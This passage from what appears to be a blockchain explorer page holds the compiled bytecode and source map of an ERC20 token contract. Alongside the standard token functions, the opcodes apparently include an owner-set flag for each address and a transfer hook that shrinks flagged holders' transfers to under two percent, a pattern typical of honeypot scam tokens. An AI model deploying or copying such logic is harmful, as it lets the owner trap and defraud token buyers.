000611153826110e8565b61115d81856110f3565b935061116d818560208601611104565b61117681611137565b840191505092915050565b6000602082019050818103600083015261119b8184611148565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111ce826111a3565b9050919050565b6111de816111c3565b81146111e957600080fd5b50565b6000813590506111fb816111d5565b92915050565b6000806040838503121561121857611217610fe3565b5b6000611226858286016111ec565b92505060206112378582860161100e565b9150509250929050565b60008115159050919050565b61125681611241565b82525050565b6000602082019050611271600083018461124d565b92915050565b61128081610fed565b82525050565b600060208201905061129b6000830184611277565b92915050565b6000806000606084860312156112ba576112b9610fe3565b5b60006112c8868287016111ec565b93505060206112d9868287016111ec565b92505060406112ea8682870161100e565b9150509250925092565b600060ff82169050919050565b61130a816112f4565b82525050565b60006020820190506113256000830184611301565b92915050565b60006020828403121561134157611340610fe3565b5b600061134f848285016111ec565b91505092915050565b611361816111c3565b82525050565b600060208201905061137c6000830184611358565b92915050565b6000806040838503121561139957611398610fe3565b5b60006113a7858286016111ec565b92505060206113b8858286016111ec565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061142b82610fed565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361145d5761145c6113f1565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806114af57607f821691505b6020821081036114c2576114c1611468565b5b50919050565b60006114d382610fed565b91506114de83610fed565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611513576115126113f1565b5b828201905092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061157a6025836110f3565b91506115858261151e565b604082019050919050565b600060208201905081810360008301526115a98161156d565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061160c6026836110f3565b9150611617826115b0565b604082019050919050565b6000602082019050818103600083015261163b816115ff565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061169e6024836110f3565b91506116a982611642565b604082019050919050565b600060208201905081810360008301526116cd81611691565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006117306022836110f3565b915061173b826116d4565b604082019050919050565b6000602082019050818103600083015261175f81611723565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061179c601d836110f3565b91506117a782611766565b602082019050919050565b600060208201905081810360008301526117cb8161178f565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061182e6025836110f3565b9150611839826117d2565b604082019050919050565b6000602082019050818103600083015261185d81611821565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006118c06023836110f3565b91506118cb82611864565b604082019050919050565b600060208201905081810360008301526118ef816118b3565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006119526026836110f3565b915061195d826118f6565b604082019050919050565b6000602082019050818103600083015261198181611945565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006119be6020836110f3565b91506119c982611988565b602082019050919050565b600060208201905081810360008301526119ed816119b1565b9050919050565b60006119ff82610fed565b9150611a0a83610fed565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611a4357611a426113f1565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611a8882610fed565b9150611a9383610fed565b925082611aa357611aa2611a4e565b5b82820490509291505056fea2646970667358221220356eb705e164beb7c5473b935310f9b83d7b3e00a417d8221906a7e61eecaf0f64736f6c634300080d0033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101005760003560e01c806370a0823111610097578063a457c2d711610066578063a457c2d7146102b1578063a9059cbb146102e1578063dd62ed3e14610311578063f2fde38b1461034157610100565b806370a082311461023b578063715018a61461026b5780638da5cb5b1461027557806395d89b411461029357610100565b806323b872dd116100d357806323b872dd1461018d578063313ce567146101bd57806339509351146101db5780633fcacaa01461020b57610100565b806305c38bb91461010557806306fdde0314610121578063095ea7b31461013f57806318160ddd1461016f575b600080fd5b61011f600480360381019061011a9190611088565b61035d565b005b61012961042e565b6040516101369190611181565b60405180910390f35b61015960048036038101906101549190611201565b6104c0565b604051610166919061125c565b60405180910390f35b6101776104e3565b6040516101849190611286565b60405180910390f35b6101a760048036038101906101a291906112a1565b6104ed565b6040516101b4919061125c565b60405180910390f35b6101c561051c565b6040516101d29190611310565b60405180910390f35b6101f560048036038101906101f09190611201565b610525565b604051610202919061125c565b60405180910390f35b6102256004803603810190610220919061132b565b61055c565b6040516102329190611286565b60405180910390f35b6102556004803603810190610250919061132b565b6105a5565b6040516102629190611286565b60405180910390f35b6102736105ee565b005b61027d610602565b60405161028a9190611367565b60405180910390f35b61029b61062b565b6040516102a89190611181565b60405180910390f35b6102cb60048036038101906102c69190611201565b6106bd565b6040516102d8919061125c565b60405180910390f35b6102fb60048036038101906102f69190611201565b610734565b604051610308919061125c565b60405180910390f35b61032b60048036038101906103269190611382565b610757565b6040516103389190611286565b60405180910390f35b61035b6004803603810190610356919061132b565b6107de565b005b610365610602565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461039c57600080fd5b60005b828290508110156104285783600360008585858181106103c2576103c16113c2565b5b90506020020160208101906103d7919061132b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550808061042090611420565b91505061039f565b50505050565b60606004805461043d90611497565b80601f016020809104026020016040519081016040528092919081815260200182805461046990611497565b80156104b65780601f1061048b576101008083540402835291602001916104b6565b820191906000526020600020905b81548152906001019060200180831161049957829003601f168201915b5050505050905090565b6000806104cb610861565b90506104d8818585610869565b600191505092915050565b6000600654905090565b6000806104f8610861565b9050610505858285610a32565b610510858585610abe565b60019150509392505050565b60006012905090565b600080610530610861565b90506105518185856105428589610757565b61054c91906114c8565b610869565b600191505092915050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105f6610d3c565b6106006000610dba565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461063a90611497565b80601f016020809104026020016040519081016040528092919081815260200182805461066690611497565b80156106b35780601f10610688576101008083540402835291602001916106b3565b820191906000526020600020905b81548152906001019060200180831161069657829003601f168201915b5050505050905090565b6000806106c8610861565b905060006106d68286610757565b90508381101561071b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161071290611590565b60405180910390fd5b6107288286868403610869565b60019250505092915050565b60008061073f610861565b905061074c818585610abe565b600191505092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107e6610d3c565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610855576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161084c90611622565b60405180910390fd5b61085e81610dba565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108cf906116b4565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610947576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161093e90611746565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a259190611286565b60405180910390a3505050565b6000610a3e8484610757565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610ab85781811015610aaa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aa1906117b2565b60405180910390fd5b610ab78484848403610869565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b2d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b2490611844565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b93906118d6565b60405180910390fd5b6000610ba9848484610e7e565b90506000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610c32576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c2990611968565b60405180910390fd5b828103600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610d229190611286565b60405180910390a3610d35858585610f2c565b5050505050565b610d44610861565b73ffffffffffffffffffffffffffffffffffffffff16610d62610602565b73ffffffffffffffffffffffffffffffffffffffff1614610db8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610daf906119d4565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006002600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610f0c91906114c8565b10610f2157610f1a82610fbe565b9050610f25565b8190505b9392505050565b6001600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205403610fb9576002600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b600062066a44611b3983610fd291906119f4565b610fdc9190611a7d565b9050919050565b600080fd5b600080fd5b6000819050919050565b61100081610fed565b811461100b57600080fd5b50565b60008135905061101d81610ff7565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261104857611047611023565b5b8235905067ffffffffffffffff81111561106557611064611028565b5b6020830191508360208202830111156110815761108061102d565b5b9250929050565b6000806000604084860312156110a1576110a0610fe3565b5b60006110af8682870161100e565b935050602084013567ffffffffffffffff8111156110d0576110cf610fe8565b5b6110dc86828701611032565b92509250509250925092565b600081519050919050565b600082825260208201905092915050565b60005b83811015611122578082015181840152602081019050611107565b83811115611131576000848401525b50505050565b6000601f19601f8301169050919050565b6000611153826110e8565b61115d81856110f3565b935061116d818560208601611104565b61117681611137565b840191505092915050565b6000602082019050818103600083015261119b8184611148565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111ce826111a3565b9050919050565b6111de816111c3565b81146111e957600080fd5b50565b6000813590506111fb816111d5565b92915050565b6000806040838503121561121857611217610fe3565b5b6000611226858286016111ec565b92505060206112378582860161100e565b9150509250929050565b60008115159050919050565b61125681611241565b82525050565b6000602082019050611271600083018461124d565b92915050565b61128081610fed565b82525050565b600060208201905061129b6000830184611277565b92915050565b6000806000606084860312156112ba576112b9610fe3565b5b60006112c8868287016111ec565b93505060206112d9868287016111ec565b92505060406112ea8682870161100e565b9150509250925092565b600060ff82169050919050565b61130a816112f4565b82525050565b60006020820190506113256000830184611301565b92915050565b60006020828403121561134157611340610fe3565b5b600061134f848285016111ec565b91505092915050565b611361816111c3565b82525050565b600060208201905061137c6000830184611358565b92915050565b6000806040838503121561139957611398610fe3565b5b60006113a7858286016111ec565b92505060206113b8858286016111ec565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061142b82610fed565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361145d5761145c6113f1565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806114af57607f821691505b6020821081036114c2576114c1611468565b5b50919050565b60006114d382610fed565b91506114de83610fed565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611513576115126113f1565b5b828201905092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061157a6025836110f3565b91506115858261151e565b604082019050919050565b600060208201905081810360008301526115a98161156d565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061160c6026836110f3565b9150611617826115b0565b604082019050919050565b6000602082019050818103600083015261163b816115ff565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061169e6024836110f3565b91506116a982611642565b604082019050919050565b600060208201905081810360008301526116cd81611691565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006117306022836110f3565b915061173b826116d4565b604082019050919050565b6000602082019050818103600083015261175f81611723565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061179c601d836110f3565b91506117a782611766565b602082019050919050565b600060208201905081810360008301526117cb8161178f565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061182e6025836110f3565b9150611839826117d2565b604082019050919050565b6000602082019050818103600083015261185d81611821565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006118c06023836110f3565b91506118cb82611864565b604082019050919050565b600060208201905081810360008301526118ef816118b3565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006119526026836110f3565b915061195d826118f6565b604082019050919050565b6000602082019050818103600083015261198181611945565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006119be6020836110f3565b91506119c982611988565b602082019050919050565b600060208201905081810360008301526119ed816119b1565b9050919050565b60006119ff82610fed565b9150611a0a83610fed565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611a4357611a426113f1565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611a8882610fed565b9150611a9383610fed565b925082611aa357611aa2611a4e565b5b82820490509291505056fea2646970667358221220356eb705e164beb7c5473b935310f9b83d7b3e00a417d8221906a7e61eecaf0f64736f6c634300080d0033

Deployed Bytecode Sourcemap

81:500:3:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;339:240;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;918:98:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3196:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2007:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3955:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1855:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6840:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;216:117:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2171:125:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2458:101:0;;;:::i;:::-;;1835:85;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1129:102:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4728:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2492:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2739:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2708:198:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;339:240:3;447:7;:5;:7::i;:::-;433:21;;:10;:21;;;424:32;;;;;;471:9;466:107;490:6;;:13;;486:1;:17;466:107;;;551:11;524:13;:24;538:6;;545:1;538:9;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;524:24;;;;;;;;;;;;;;;:38;;;;505:3;;;;;:::i;:::-;;;;466:107;;;;339:240;;;:::o;918:98:1:-;972:13;1004:5;997:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;918:98;:::o;3196:197::-;3279:4;3295:13;3311:12;:10;:12::i;:::-;3295:28;;3333:32;3342:5;3349:7;3358:6;3333:8;:32::i;:::-;3382:4;3375:11;;;3196:197;;;;:::o;2007:106::-;2068:7;2094:12;;2087:19;;2007:106;:::o;3955:286::-;4082:4;4098:15;4116:12;:10;:12::i;:::-;4098:30;;4138:38;4154:4;4160:7;4169:6;4138:15;:38::i;:::-;4186:27;4196:4;4202:2;4206:6;4186:9;:27::i;:::-;4230:4;4223:11;;;3955:286;;;;;:::o;1855:91::-;1913:5;1937:2;1930:9;;1855:91;:::o;6840:234::-;6928:4;6944:13;6960:12;:10;:12::i;:::-;6944:28;;6982:64;6991:5;6998:7;7035:10;7007:25;7017:5;7024:7;7007:9;:25::i;:::-;:38;;;;:::i;:::-;6982:8;:64::i;:::-;7063:4;7056:11;;;6840:234;;;;:::o;216:117:3:-;276:7;302:13;:24;316:9;302:24;;;;;;;;;;;;;;;;295:31;;216:117;;;:::o;2171:125:1:-;2245:7;2271:9;:18;2281:7;2271:18;;;;;;;;;;;;;;;;2264:25;;2171:125;;;:::o;2458:101:0:-;1728:13;:11;:13::i;:::-;2522:30:::1;2549:1;2522:18;:30::i;:::-;2458:101::o:0;1835:85::-;1881:7;1907:6;;;;;;;;;;;1900:13;;1835:85;:::o;1129:102:1:-;1185:13;1217:7;1210:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1129:102;:::o;4728:427::-;4821:4;4837:13;4853:12;:10;:12::i;:::-;4837:28;;4875:24;4902:25;4912:5;4919:7;4902:9;:25::i;:::-;4875:52;;4965:15;4945:16;:35;;4937:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;5056:60;5065:5;5072:7;5100:15;5081:16;:34;5056:8;:60::i;:::-;5144:4;5137:11;;;;4728:427;;;;:::o;2492:189::-;2571:4;2587:13;2603:12;:10;:12::i;:::-;2587:28;;2625;2635:5;2642:2;2646:6;2625:9;:28::i;:::-;2670:4;2663:11;;;2492:189;;;;:::o;2739:149::-;2828:7;2854:11;:18;2866:5;2854:18;;;;;;;;;;;;;;;:27;2873:7;2854:27;;;;;;;;;;;;;;;;2847:34;;2739:149;;;;:::o;2708:198:0:-;1728:13;:11;:13::i;:::-;2816:1:::1;2796:22;;:8;:22;;::::0;2788:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;2871:28;2890:8;2871:18;:28::i;:::-;2708:198:::0;:::o;588:96::-;641:7;667:10;660:17;;588:96;:::o;9589:370:1:-;9737:1;9720:19;;:5;:19;;;9712:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9817:1;9798:21;;:7;:21;;;9790:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9899:6;9869:11;:18;9881:5;9869:18;;;;;;;;;;;;;;;:27;9888:7;9869:27;;;;;;;;;;;;;;;:36;;;;9936:7;9920:32;;9929:5;9920:32;;;9945:6;9920:32;;;;;;:::i;:::-;;;;;;;;9589:370;;;:::o;10240:441::-;10370:24;10397:25;10407:5;10414:7;10397:9;:25::i;:::-;10370:52;;10456:17;10436:16;:37;10432:243;;10517:6;10497:16;:26;;10489:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;10599:51;10608:5;10615:7;10643:6;10624:16;:25;10599:8;:51::i;:::-;10432:243;10360:321;10240:441;;;:::o;5608:837::-;5750:1;5734:18;;:4;:18;;;5726:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5826:1;5812:16;;:2;:16;;;5804:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;5879:15;5897:38;5918:4;5924:2;5928:6;5897:20;:38::i;:::-;5879:56;;5946:19;5968:9;:15;5978:4;5968:15;;;;;;;;;;;;;;;;5946:37;;6016:6;6001:11;:21;;5993:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;6131:6;6117:11;:20;6099:9;:15;6109:4;6099:15;;;;;;;;;;;;;;;:38;;;;6331:7;6314:9;:13;6324:2;6314:13;;;;;;;;;;;;;;;;:24;;;;;;;;;;;6379:2;6364:26;;6373:4;6364:26;;;6383:6;6364:26;;;;;;:::i;:::-;;;;;;;;6401:37;6421:4;6427:2;6431:6;6401:19;:37::i;:::-;5716:729;;5608:837;;;:::o;1993:130:0:-;2067:12;:10;:12::i;:::-;2056:23;;:7;:5;:7::i;:::-;:23;;;2048:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1993:130::o;3060:187::-;3133:16;3152:6;;;;;;;;;;;3133:25;;3177:8;3168:6;;:17;;;;;;;;;;;;;;;;;;3231:8;3200:40;;3221:8;3200:40;;;;;;;;;;;;3123:124;3060:187;:::o;12128:324:1:-;12253:7;12345:1;12324:13;:17;12338:2;12324:17;;;;;;;;;;;;;;;;12302:13;:19;12316:4;12302:19;;;;;;;;;;;;;;;;:39;;;;:::i;:::-;:44;12298:148;;12369:22;12384:6;12369:14;:22::i;:::-;12362:29;;;;12298:148;12429:6;12422:13;;12128:324;;;;;;:::o;11368:176::-;11511:1;11490:13;:17;11504:2;11490:17;;;;;;;;;;;;;;;;:22;11486:52;;11535:1;11515:13;:17;11529:2;11515:17;;;;;;;;;;;;;;;:21;;;;11486:52;11368:176;;;:::o;10687:93::-;10744:7;10772:6;10765:4;10761:1;:8;;;;:::i;:::-;:17;;;;:::i;:::-;10754:24;;10687:93;;;:::o;88:117:4:-;197:1;194;187:12;211:117;320:1;317;310:12;334:77;371:7;400:5;389:16;;334:77;;;:::o;417:122::-;490:24;508:5;490:24;:::i;:::-;483:5;480:35;470:63;;529:1;526;519:12;470:63;417:122;:::o;545:139::-;591:5;629:6;616:20;607:29;;645:33;672:5;645:33;:::i;:::-;545:139;;;;:::o;690:117::-;799:1;796;789:12;813:117;922:1;919;912:12;936:117;1045:1;1042;1035:12;1076:568;1149:8;1159:6;1209:3;1202:4;1194:6;1190:17;1186:27;1176:122;;1217:79;;:::i;:::-;1176:122;1330:6;1317:20;1307:30;;1360:18;1352:6;1349:30;1346:117;;;1382:79;;:::i;:::-;1346:117;1496:4;1488:6;1484:17;1472:29;;1550:3;1542:4;1534:6;1530:17;1520:8;1516:32;1513:41;1510:128;;;1557:79;;:::i;:::-;1510:128;1076:568;;;;;:::o;1650:704::-;1745:6;1753;1761;1810:2;1798:9;1789:7;1785:23;1781:32;1778:119;;;1816:79;;:::i;:::-;1778:119;1936:1;1961:53;2006:7;1997:6;1986:9;1982:22;1961:53;:::i;:::-;1951:63;;1907:117;2091:2;2080:9;2076:18;2063:32;2122:18;2114:6;2111:30;2108:117;;;2144:79;;:::i;:::-;2108:117;2257:80;2329:7;2320:6;2309:9;2305:22;2257:80;:::i;:::-;2239:98;;;;2034:313;1650:704;;;;;:::o;2360:99::-;2412:6;2446:5;2440:12;2430:22;;2360:99;;;:::o;2465:169::-;2549:11;2583:6;2578:3;2571:19;2623:4;2618:3;2614:14;2599:29;;2465:169;;;;:::o;2640:307::-;2708:1;2718:113;2732:6;2729:1;2726:13;2718:113;;;2817:1;2812:3;2808:11;2802:18;2798:1;2793:3;2789:11;2782:39;2754:2;2751:1;2747:10;2742:15;;2718:113;;;2849:6;2846:1;2843:13;2840:101;;;2929:1;2920:6;2915:3;2911:16;2904:27;2840:101;2689:258;2640:307;;;:::o;2953:102::-;2994:6;3045:2;3041:7;3036:2;3029:5;3025:14;3021:28;3011:38;;2953:102;;;:::o;3061:364::-;3149:3;3177:39;3210:5;3177:39;:::i;:::-;3232:71;3296:6;3291:3;3232:71;:::i;:::-;3225:78;;3312:52;3357:6;3352:3;3345:4;3338:5;3334:16;3312:52;:::i;:::-;3389:29;3411:6;3389:29;:::i;:::-;3384:3;3380:39;3373:46;;3153:272;3061:364;;;;:::o;3431:313::-;3544:4;3582:2;3571:9;3567:18;3559:26;;3631:9;3625:4;3621:20;3617:1;3606:9;3602:17;3595:47;3659:78;3732:4;3723:6;3659:78;:::i;:::-;3651:86;;3431:313;;;;:::o;3750:126::-;3787:7;3827:42;3820:5;3816:54;3805:65;;3750:126;;;:::o;3882:96::-;3919:7;3948:24;3966:5;3948:24;:::i;:::-;3937:35;;3882:96;;;:::o;3984:122::-;4057:24;4075:5;4057:24;:::i;:::-;4050:5;4047:35;4037:63;;4096:1;4093;4086:12;4037:63;3984:122;:::o;4112:139::-;4158:5;4196:6;4183:20;4174:29;;4212:33;4239:5;4212:33;:::i;:::-;4112:139;;;;:::o;4257:474::-;4325:6;4333;4382:2;4370:9;4361:7;4357:23;4353:32;4350:119;;;4388:79;;:::i;:::-;4350:119;4508:1;4533:53;4578:7;4569:6;4558:9;4554:22;4533:53;:::i;:::-;4523:63;;4479:117;4635:2;4661:53;4706:7;4697:6;4686:9;4682:22;4661:53;:::i;:::-;4651:63;;4606:118;4257:474;;;;;:::o;4737:90::-;4771:7;4814:5;4807:13;4800:21;4789:32;;4737:90;;;:::o;4833:109::-;4914:21;4929:5;4914:21;:::i;:::-;4909:3;4902:34;4833:109;;:::o;4948:210::-;5035:4;5073:2;5062:9;5058:18;5050:26;;5086:65;5148:1;5137:9;5133:17;5124:6;5086:65;:::i;:::-;4948:210;;;;:::o;5164:118::-;5251:24;5269:5;5251:24;:::i;:::-;5246:3;5239:37;5164:118;;:::o;5288:222::-;5381:4;5419:2;5408:9;5404:18;5396:26;;5432:71;5500:1;5489:9;5485:17;5476:6;5432:71;:::i;:::-;5288:222;;;;:::o;5516:619::-;5593:6;5601;5609;5658:2;5646:9;5637:7;5633:23;5629:32;5626:119;;;5664:79;;:::i;:::-;5626:119;5784:1;5809:53;5854:7;5845:6;5834:9;5830:22;5809:53;:::i;:::-;5799:63;;5755:117;5911:2;5937:53;5982:7;5973:6;5962:9;5958:22;5937:53;:::i;:::-;5927:63;;5882:118;6039:2;6065:53;6110:7;6101:6;6090:9;6086:22;6065:53;:::i;:::-;6055:63;;6010:118;5516:619;;;;;:::o;6141:86::-;6176:7;6216:4;6209:5;6205:16;6194:27;;6141:86;;;:::o;6233:112::-;6316:22;6332:5;6316:22;:::i;:::-;6311:3;6304:35;6233:112;;:::o;6351:214::-;6440:4;6478:2;6467:9;6463:18;6455:26;;6491:67;6555:1;6544:9;6540:17;6531:6;6491:67;:::i;:::-;6351:214;;;;:::o;6571:329::-;6630:6;6679:2;6667:9;6658:7;6654:23;6650:32;6647:119;;;6685:79;;:::i;:::-;6647:119;6805:1;6830:53;6875:7;6866:6;6855:9;6851:22;6830:53;:::i;:::-;6820:63;;6776:117;6571:329;;;;:::o;6906:118::-;6993:24;7011:5;6993:24;:::i;:::-;6988:3;6981:37;6906:118;;:::o;7030:222::-;7123:4;7161:2;7150:9;7146:18;7138:26;;7174:71;7242:1;7231:9;7227:17;7218:6;7174:71;:::i;:::-;7030:222;;;;:::o;7258:474::-;7326:6;7334;7383:2;7371:9;7362:7;7358:23;7354:32;7351:119;;;7389:79;;:::i;:::-;7351:119;7509:1;7534:53;7579:7;7570:6;7559:9;7555:22;7534:53;:::i;:::-;7524:63;;7480:117;7636:2;7662:53;7707:7;7698:6;7687:9;7683:22;7662:53;:::i;:::-;7652:63;;7607: